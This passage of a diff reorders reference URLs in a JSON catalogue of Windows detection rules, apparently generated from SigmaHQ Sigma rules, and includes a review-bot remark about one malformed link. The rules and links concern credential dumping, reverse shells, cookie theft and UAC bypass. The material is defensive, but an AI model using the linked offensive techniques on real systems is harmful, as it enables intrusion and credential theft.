@@ -46809,9 +46833,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://lolbas-project.github.io/lolbas/Binaries/Findstr/", - "https://oddvar.moe/2018/04/11/putting-data-in-alternate-data-streams-and-how-to-execute-it-part-2/", "https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f", + "https://oddvar.moe/2018/04/11/putting-data-in-alternate-data-streams-and-how-to-execute-it-part-2/", + "https://lolbas-project.github.io/lolbas/Binaries/Findstr/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_findstr.yml" ], "tags": [ @@ -46861,10 +46885,10 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://twitter.com/gbti_sa/status/1249653895900602375?lang=en", - "https://www.trendmicro.com/en_us/research/22/i/play-ransomware-s-attack-playbook-unmasks-it-as-another-hive-aff.html", "https://www.softpedia.com/get/Antivirus/Removal-Tools/ithurricane-PowerTool.shtml", "https://thedfirreport.com/2022/11/28/emotet-strikes-again-lnk-file-leads-to-domain-wide-ransomware/", + "https://www.trendmicro.com/en_us/research/22/i/play-ransomware-s-attack-playbook-unmasks-it-as-another-hive-aff.html", + "https://twitter.com/gbti_sa/status/1249653895900602375?lang=en", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powertool_execution.yml" ], "tags": [ 
@@ -47118,8 +47142,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://learn.microsoft.com/en-us/previous-versions/office/troubleshoot/office-developer/automate-word-create-file-using-visual-basic", "https://github.com/med0x2e/vba2clr", + "https://learn.microsoft.com/en-us/previous-versions/office/troubleshoot/office-developer/automate-word-create-file-using-visual-basic", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_office_svchost_child.yml" ], "tags": [ @@ -47167,8 +47191,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://twitter.com/_felamos/status/1179811992841797632", "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Devtoolslauncher/", + "https://twitter.com/_felamos/status/1179811992841797632", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_devtoolslauncher.yml" ], "tags": [ @@ -47235,9 +47259,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://lolbas-project.github.io/lolbas/Binaries/Regini/", - "https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f", "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/regini", + "https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f", + "https://lolbas-project.github.io/lolbas/Binaries/Regini/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_regini.yml" ], "tags": [ 
@@ -47319,8 +47343,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://www.fireeye.com/blog/threat-research/2020/03/apt41-initiates-global-intrusion-campaign-using-multiple-exploits.html", "https://vulmon.com/exploitdetails?qidtp=exploitdb&qid=48224", + "https://www.fireeye.com/blog/threat-research/2020/03/apt41-initiates-global-intrusion-campaign-using-multiple-exploits.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_exploit_cve_2020_10189.yml" ], "tags": [ @@ -47465,8 +47489,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://github.com/vadim-hunter/Detection-Ideas-Rules/blob/02bcbfc2bfb8b4da601bb30de0344ae453aa1afe/Threat%20Intelligence/The%20DFIR%20Report/20210329_Sodinokibi_(aka_REvil)_Ransomware.yaml", "https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/", + "https://github.com/vadim-hunter/Detection-Ideas-Rules/blob/02bcbfc2bfb8b4da601bb30de0344ae453aa1afe/Threat%20Intelligence/The%20DFIR%20Report/20210329_Sodinokibi_(aka_REvil)_Ransomware.yaml", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_office_proxy_exec_wmic.yml" ], "tags": [ @@ -47516,8 +47540,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://twitter.com/tccontre18/status/1480950986650832903", "https://twitter.com/mrd0x/status/1461041276514623491c19-ps", + "https://twitter.com/tccontre18/status/1480950986650832903", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_regsvr32_http_pattern.yml" ], "tags": [ 
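Review bot: The `proc_creation_win_susp_regsvr32_http_pattern` refs entry `https://twitter.com/mrd0x/status/1461041276514623491c19-ps` is malformed: a tweet status ID is purely numeric, and the trailing `c19-ps` looks like the tail of a `?view=windowsserver2019-ps` Microsoft Docs query string fused onto it (inferred from the pattern; verify). It is a context line, so this commit did not introduce it, but the broken link is shipped in the new file. Check the upstream Sigma rule's `references`, restore the intended URL there, and regenerate rather than patching the JSON by hand. The enclosing cluster object extends beyond the hunk on both sides.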
@@ -47729,8 +47753,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://www.reverse.it/sample/0b4ef455e385b750d9f90749f1467eaf00e46e8d6c2885c260e1b78211a51684?environmentId=100", "https://www.hybrid-analysis.com/sample/0b4ef455e385b750d9f90749f1467eaf00e46e8d6c2885c260e1b78211a51684?environmentId=100", + "https://www.reverse.it/sample/0b4ef455e385b750d9f90749f1467eaf00e46e8d6c2885c260e1b78211a51684?environmentId=100", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_exploit_cve_2017_8759.yml" ], "tags": [ @@ -47895,8 +47919,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://github.com/Neo23x0/Raccine/blob/20a569fa21625086433dcce8bb2765d0ea08dcb6/yara/mal_revil.yar", "https://thedfirreport.com/2022/05/09/seo-poisoning-a-gootloader-story/", + "https://github.com/Neo23x0/Raccine/blob/20a569fa21625086433dcce8bb2765d0ea08dcb6/yara/mal_revil.yar", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_base64_reflective_assembly_load.yml" ], "tags": [ @@ -47999,8 +48023,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Bginfo/", "https://oddvar.moe/2017/05/18/bypassing-application-whitelisting-with-bginfo/", + "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Bginfo/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_bginfo.yml" ], "tags": [ 
@@ -48051,8 +48075,8 @@ "logsource.product": "windows", "refs": [ "https://github.com/S3cur3Th1sSh1t/Creds/blob/eac23d67f7f90c7fc8e3130587d86158c22aa398/PowershellScripts/jaws-enum.ps1", - "https://github.com/nccgroup/redsnarf/blob/35949b30106ae543dc6f2bc3f1be10c6d9a8d40e/redsnarf.py", "https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/", + "https://github.com/nccgroup/redsnarf/blob/35949b30106ae543dc6f2bc3f1be10c6d9a8d40e/redsnarf.py", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wmic_unquoted_service_search.yml" ], "tags": [ @@ -48085,8 +48109,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://lolbas-project.github.io/lolbas/Binaries/Eventvwr/#execute", "https://twitter.com/orange_8361/status/1518970259868626944", + "https://lolbas-project.github.io/lolbas/Binaries/Eventvwr/#execute", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_uac_bypass_eventvwr.yml" ], "tags": [ 
@@ -48111,11 +48135,11 @@ "logsource.product": "windows", "refs": [ "https://thedfirreport.com/2021/01/11/trickbot-still-alive-and-well/", - "https://www.joeware.net/freetools/tools/adfind/", - "https://www.microsoft.com/security/blog/2021/01/20/deep-dive-into-the-solorigate-second-stage-activation-from-sunburst-to-teardrop-and-raindrop/", - "https://thedfirreport.com/2020/05/08/adfind-recon/", "https://social.technet.microsoft.com/wiki/contents/articles/7535.adfind-command-examples.aspx", "https://github.com/center-for-threat-informed-defense/adversary_emulation_library/blob/bf62ece1c679b07b5fb49c4bae947fe24c81811f/fin6/Emulation_Plan/Phase1.md", + "https://www.microsoft.com/security/blog/2021/01/20/deep-dive-into-the-solorigate-second-stage-activation-from-sunburst-to-teardrop-and-raindrop/", + "https://thedfirreport.com/2020/05/08/adfind-recon/", + "https://www.joeware.net/freetools/tools/adfind/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_renamed_adfind.yml" ], "tags": [ @@ -48364,8 +48388,8 @@ "logsource.product": "windows", "refs": [ "https://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet", - "https://www.php.net/manual/en/features.commandline.php", "https://www.revshells.com/", + "https://www.php.net/manual/en/features.commandline.php", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_php_inline_command_execution.yml" ], "tags": [ 
@@ -48422,9 +48446,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://ss64.com/bash/rar.html", - "https://labs.sentinelone.com/the-anatomy-of-an-apt-attack-and-cobaltstrike-beacons-encoded-configuration/", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1560.001/T1560.001.md", + "https://labs.sentinelone.com/the-anatomy-of-an-apt-attack-and-cobaltstrike-beacons-encoded-configuration/", + "https://ss64.com/bash/rar.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_rar_flags.yml" ], "tags": [ @@ -48528,8 +48552,8 @@ "logsource.product": "windows", "refs": [ "https://app.any.run/tasks/7eaba74e-c1ea-400f-9c17-5e30eee89906/", - "https://www.youtube.com/watch?v=DsJ9ByX84o4&t=6s", "https://brica.de/alerts/alert/public/1247926/agent-tesla-keylogger-delivered-inside-a-power-iso-daa-archive/", + "https://www.youtube.com/watch?v=DsJ9ByX84o4&t=6s", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_whoami_anomaly.yml" ], "tags": [ @@ -48657,8 +48681,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://docs.microsoft.com/pt-br/windows/win32/secauthz/sid-strings", "https://www.sans.org/blog/red-team-tactics-hiding-windows-services/", + "https://docs.microsoft.com/pt-br/windows/win32/secauthz/sid-strings", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_service_dacl_modification.yml" ], "tags": [ 
@@ -48882,14 +48906,14 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218/T1218.md", - "https://github.com/keyboardcrunch/SentinelOne-ATTACK-Queries/blob/6a228d23eefe963ca81f2d52f94b815f61ef5ee0/Tactics/DefenseEvasion.md#t1055-process-injection", + "https://twitter.com/Hexacorn/status/776122138063409152", "https://posts.specterops.io/mavinject-exe-functionality-deconstructed-c29ab2cf5c0e", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218/T1218.md", + "https://github.com/SigmaHQ/sigma/issues/3742", + "https://github.com/keyboardcrunch/SentinelOne-ATTACK-Queries/blob/6a228d23eefe963ca81f2d52f94b815f61ef5ee0/Tactics/DefenseEvasion.md#t1055-process-injection", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1056.004/T1056.004.md", "https://twitter.com/gN3mes1s/status/941315826107510784", "https://reaqta.com/2017/12/mavinject-microsoft-injector/", - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1056.004/T1056.004.md", - "https://twitter.com/Hexacorn/status/776122138063409152", - "https://github.com/SigmaHQ/sigma/issues/3742", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_mavinject_process_injection.yml" ], "tags": [ 
@@ -49054,12 +49078,12 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ + "https://news.sophos.com/en-us/2019/12/09/snatch-ransomware-reboots-pcs-into-safe-mode-to-bypass-protection/", + "https://assets.documentcloud.org/documents/20444693/fbi-pin-egregor-ransomware-bc-01062021.pdf", + "https://www.fireeye.com/blog/threat-research/2020/05/tactics-techniques-procedures-associated-with-maze-ransomware-incidents.html", "https://labs.f-secure.com/blog/prelude-to-ransomware-systembc", "https://github.com/3CORESec/MAL-CL/tree/master/Descriptors/Other/Advanced%20IP%20Scanner", - "https://news.sophos.com/en-us/2019/12/09/snatch-ransomware-reboots-pcs-into-safe-mode-to-bypass-protection/", "https://thedfirreport.com/2021/01/18/all-that-for-a-coinminer", - "https://www.fireeye.com/blog/threat-research/2020/05/tactics-techniques-procedures-associated-with-maze-ransomware-incidents.html", - "https://assets.documentcloud.org/documents/20444693/fbi-pin-egregor-ransomware-bc-01062021.pdf", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_advanced_ip_scanner.yml" ], "tags": [ @@ -49084,8 +49108,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://twitter.com/med0x2e/status/1520402518685200384", "https://github.com/elastic/detection-rules/blob/dd224fb3f81d0b4bf8593c5f02a029d647ba2b2d/rules/windows/credential_access_relay_ntlm_auth_via_http_spoolss.toml", + "https://twitter.com/med0x2e/status/1520402518685200384", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_ntlmrelay.yml" ], "tags": [ 
@@ -49119,8 +49143,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://threathunterplaybook.com/evals/apt29/detections/7.A.2_F4609F7E-C4DB-4327-91D4-59A58C962A02.html", "https://github.com/OTRF/detection-hackathon-apt29/issues/16", + "https://threathunterplaybook.com/evals/apt29/detections/7.A.2_F4609F7E-C4DB-4327-91D4-59A58C962A02.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_get_clipboard.yml" ], "tags": [ @@ -49144,8 +49168,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://blog.malwarebytes.com/threat-intelligence/2021/08/new-variant-of-konni-malware-used-in-campaign-targetting-russia/", "https://labs.sentinelone.com/meteorexpress-mysterious-wiper-paralyzes-iranian-trains-with-epic-troll", + "https://blog.malwarebytes.com/threat-intelligence/2021/08/new-variant-of-konni-malware-used-in-campaign-targetting-russia/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_expand_cabinet_files.yml" ], "tags": [ @@ -49269,8 +49293,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://thedfirreport.com/2022/07/11/select-xmrig-from-sqlserver/", "https://docs.microsoft.com/en-us/windows/win32/wmisdk/mofcomp", + "https://thedfirreport.com/2022/07/11/select-xmrig-from-sqlserver/", "https://github.com/The-DFIR-Report/Sigma-Rules/blob/75260568a7ffe61b2458ca05f6f25914efb44337/win_mofcomp_execution.yml", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_mofcomp_execution.yml" ], 
@@ -49329,9 +49353,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://app.any.run/tasks/210244b9-0b6b-4a2c-83a3-04bd3175d017/", - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.004/T1562.004.md#atomic-test-1---disable-microsoft-defender-firewall", "https://www.winhelponline.com/blog/enable-and-disable-windows-firewall-quickly-using-command-line/", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.004/T1562.004.md#atomic-test-1---disable-microsoft-defender-firewall", + "https://app.any.run/tasks/210244b9-0b6b-4a2c-83a3-04bd3175d017/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_netsh_firewall_disable.yml" ], "tags": [ @@ -49398,9 +49422,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://www.fortiguard.com/threat-signal-report/4718?s=09", "https://lolbas-project.github.io/lolbas/Binaries/Regasm/", "https://lolbas-project.github.io/lolbas/Binaries/Regsvcs/", + "https://www.fortiguard.com/threat-signal-report/4718?s=09", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_regasm.yml" ], "tags": [ @@ -49433,10 +49457,10 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://yoroi.company/wp-content/uploads/2022/05/EternityGroup_report_compressed.pdf", + "https://www.mdsec.co.uk/2022/10/analysing-lastpass-part-1/", "https://github.com/defaultnamehere/cookie_crimes/", "https://github.com/wunderwuzzi23/firefox-cookiemonster", - "https://www.mdsec.co.uk/2022/10/analysing-lastpass-part-1/", + "https://yoroi.company/wp-content/uploads/2022/05/EternityGroup_report_compressed.pdf", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_browser_remote_debugging.yml" ], "tags": [ 
@@ -49576,8 +49600,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1490/T1490.md", "https://eqllib.readthedocs.io/en/latest/analytics/c4732632-9c1d-4980-9fa8-1d98c93f918e.html", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1490/T1490.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_bootconf_mod.yml" ], "tags": [ @@ -49736,8 +49760,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://www.welivesecurity.com/2022/01/18/donot-go-do-not-respawn/", "https://www.joesandbox.com/analysis/514608/0/html#324415FF7D8324231381BAD48A052F85DF04", + "https://www.welivesecurity.com/2022/01/18/donot-go-do-not-respawn/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_schtasks_env_folder.yml" ], "tags": [ @@ -49770,8 +49794,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://docs.microsoft.com/pt-br/windows/win32/secauthz/sid-strings", "https://www.sans.org/blog/red-team-tactics-hiding-windows-services/", + "https://docs.microsoft.com/pt-br/windows/win32/secauthz/sid-strings", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_service_dacl_modification_set_service.yml" ], "tags": [ @@ -49795,8 +49819,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://lolbas-project.github.io/lolbas/Binaries/Regedit/", "https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f", + "https://lolbas-project.github.io/lolbas/Binaries/Regedit/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_regedit_export_critical_keys.yml" ], "tags": [ 
@@ -49853,9 +49877,9 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
+ "https://thedfirreport.com/2022/09/26/bumblebee-round-two/",
 "https://thedfirreport.com/2022/08/08/bumblebee-roasts-its-way-to-domain-admin/",
 "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/bumblebee-loader-cybercrime",
- "https://thedfirreport.com/2022/09/26/bumblebee-round-two/",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wab_unusual_parents.yml"
 ],
 "tags": [
@@ -49964,8 +49988,8 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://eqllib.readthedocs.io/en/latest/analytics/210b4ea4-12fc-11e9-8d76-4d6bb837cda4.html",
 "https://eqllib.readthedocs.io/en/latest/analytics/1e1ef6be-12fc-11e9-8d76-4d6bb837cda4.html",
+ "https://eqllib.readthedocs.io/en/latest/analytics/210b4ea4-12fc-11e9-8d76-4d6bb837cda4.html",
 "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1003/T1003.md",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lsass_dump.yml"
 ],
@@ -50032,8 +50056,8 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://app.any.run/tasks/c28cabc8-a19f-40f3-a78b-cae506a5c0d4",
 "https://app.any.run/tasks/cfc8870b-ccd7-4210-88cf-a8087476a6d0",
+ "https://app.any.run/tasks/c28cabc8-a19f-40f3-a78b-cae506a5c0d4",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_attrib_system_susp_paths.yml"
 ],
 "tags": [
@@ -50296,10 +50320,10 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://eqllib.readthedocs.io/en/latest/analytics/aed95fc6-5e3f-49dc-8b35-06508613f979.html",
- "https://www.wietzebeukema.nl/blog/windows-command-line-obfuscation",
- "https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment",
 "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1003/T1003.md",
+ "https://eqllib.readthedocs.io/en/latest/analytics/aed95fc6-5e3f-49dc-8b35-06508613f979.html",
+ "https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment",
+ "https://www.wietzebeukema.nl/blog/windows-command-line-obfuscation",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_grabbing_sensitive_hives_via_reg.yml"
 ],
 "tags": [
@@ -50350,11 +50374,11 @@
 "logsource.product": "windows",
 "refs": [
 "https://thedfirreport.com/2021/01/11/trickbot-still-alive-and-well/",
- "https://www.joeware.net/freetools/tools/adfind/",
- "https://www.microsoft.com/security/blog/2021/01/20/deep-dive-into-the-solorigate-second-stage-activation-from-sunburst-to-teardrop-and-raindrop/",
- "https://thedfirreport.com/2020/05/08/adfind-recon/",
 "https://social.technet.microsoft.com/wiki/contents/articles/7535.adfind-command-examples.aspx",
 "https://github.com/center-for-threat-informed-defense/adversary_emulation_library/blob/bf62ece1c679b07b5fb49c4bae947fe24c81811f/fin6/Emulation_Plan/Phase1.md",
+ "https://www.microsoft.com/security/blog/2021/01/20/deep-dive-into-the-solorigate-second-stage-activation-from-sunburst-to-teardrop-and-raindrop/",
+ "https://thedfirreport.com/2020/05/08/adfind-recon/",
+ "https://www.joeware.net/freetools/tools/adfind/",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_adfind_usage.yml"
 ],
 "tags": [
@@ -50397,11 +50421,11 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://blog.alyac.co.kr/1901",
+ "https://en.wikipedia.org/wiki/Hangul_(word_processor)",
 "https://twitter.com/cyberwar_15/status/1187287262054076416",
 "https://www.securitynewspaper.com/2016/11/23/technical-teardown-exploit-malware-hwp-files/",
 "https://www.hybrid-analysis.com/search?query=context:74940dcc5b38f9f9b1a0fea760d344735d7d91b610e6d5bd34533dd0153402c5&from_sample=5db135000388385a7644131f&block_redirect=1",
- "https://en.wikipedia.org/wiki/Hangul_(word_processor)",
+ "https://blog.alyac.co.kr/1901",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hwp_exploits.yml"
 ],
 "tags": [
@@ -50602,9 +50626,9 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
+ "https://twitter.com/nas_bench/status/1534957360032120833",
 "https://web.archive.org/web/20170715043507/http://www.exploit-monday.com/2016/08/windbg-cdb-shellcode-runner.html",
 "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Cdb/",
- "https://twitter.com/nas_bench/status/1534957360032120833",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_cdb.yml"
 ],
 "tags": [
@@ -50737,8 +50761,8 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/wmic",
 "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1047/T1047.md",
+ "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/wmic",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wmic_remote_service.yml"
 ],
 "tags": [
@@ -50771,8 +50795,8 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://www.hybrid-analysis.com/sample/9b4971349ae85aa09c0a69852ed3e626c954954a3927b3d1b6646f139b930022?environmentId=100",
 "https://www.virustotal.com/en/file/9b4971349ae85aa09c0a69852ed3e626c954954a3927b3d1b6646f139b930022/analysis/",
+ "https://www.hybrid-analysis.com/sample/9b4971349ae85aa09c0a69852ed3e626c954954a3927b3d1b6646f139b930022?environmentId=100",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_crime_fireball.yml"
 ],
 "tags": [
@@ -50806,8 +50830,8 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218/T1218.md",
 "https://posts.specterops.io/arbitrary-unsigned-code-execution-vector-in-microsoft-workflow-compiler-exe-3d9294bc5efb",
+ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218/T1218.md",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_workflow_compiler.yml"
 ],
 "tags": [
@@ -50849,8 +50873,8 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://twitter.com/Oddvarmoe/status/985518877076541440",
 "https://lolbas-project.github.io/lolbas/Binaries/Print/",
+ "https://twitter.com/Oddvarmoe/status/985518877076541440",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_print.yml"
 ],
 "tags": [
@@ -51035,8 +51059,8 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://threatpost.com/maze-ransomware-ragnar-locker-virtual-machine/159350/",
 "https://news.sophos.com/en-us/2020/05/21/ragnar-locker-ransomware-deploys-virtual-machine-to-dodge-security/",
+ "https://threatpost.com/maze-ransomware-ragnar-locker-virtual-machine/159350/",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_run_virtualbox.yml"
 ],
 "tags": [
@@ -51110,9 +51134,9 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
+ "https://www.echotrail.io/insights/search/mshta.exe",
 "https://en.wikipedia.org/wiki/HTML_Application",
 "https://app.any.run/tasks/34221348-072d-4b70-93f3-aa71f6ebecad/",
- "https://www.echotrail.io/insights/search/mshta.exe",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_mshta_pattern.yml"
 ],
 "tags": [
@@ -51145,8 +51169,8 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse?slide=57",
 "https://learn.microsoft.com/en-us/dotnet/api/system.type.gettypefromclsid?view=net-7.0",
+ "https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse?slide=57",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_ps_download_com_cradles.yml"
 ],
 "tags": "No established tags"
@@ -51201,10 +51225,10 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://twitter.com/d1r4c/status/1279042657508081664",
- "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1105/T1105.md#atomic-test-19---curl-upload-file",
 "https://medium.com/@petehouston/upload-files-with-curl-93064dcccc76",
+ "https://twitter.com/d1r4c/status/1279042657508081664",
 "https://curl.se/docs/manpage.html",
+ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1105/T1105.md#atomic-test-19---curl-upload-file",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_curl_fileupload.yml"
 ],
 "tags": [
@@ -51530,9 +51554,9 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/fsutil-usn",
 "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070/T1070.md",
 "https://eqllib.readthedocs.io/en/latest/analytics/c91f422a-5214-4b17-8664-c5fcf115c0a2.html",
+ "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/fsutil-usn",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_fsutil_usage.yml"
 ],
 "tags": [
@@ -51557,9 +51581,9 @@
 "logsource.product": "windows",
 "refs": [
